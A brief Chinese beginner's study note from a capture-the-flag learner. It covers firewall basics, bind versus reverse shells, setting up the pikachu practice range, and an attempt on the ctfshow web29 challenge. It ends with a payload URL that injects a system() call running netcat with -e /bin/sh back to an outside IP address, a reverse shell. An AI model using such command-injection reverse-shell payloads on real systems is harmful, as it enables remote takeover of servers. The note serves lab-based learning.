网安小白,写的不好的地方敬请指点,轻喷谢谢!
棱角社区网站:
防火墙
入站检测严格,出站检测宽松
windows:df防火墙
linux:iptables
常用命令
windows:Windows系统命令汇总(CMD下可直接运行)_windows命令-CSDN博客
linux:【Linux】Linux常用命令60条(含完整命令语句)_linux必学的60个命令-CSDN博客
文件上传下载
可以看棱角社区的网站:
例如:
反弹shell
正向:用服务器监听攻击机连接
反向:攻击机监听服务器连接
pikachu靶场搭建
看这一篇就够了,这篇讲的是用小皮搭的靶场
复现
然后这个靶场反弹shell没弹成功,让zyf开了个ctfshow web29的靶场,然后反弹shell,连上了,但是可能CTFos这个虚拟机反应有点慢,所以没反应
payload:
https://5909aed2-8a0a-4583-84ee-76a3e7538c6c.challenge.ctf.show/?c=system("nc 113.56.218.150 11288 -e /bin/sh/");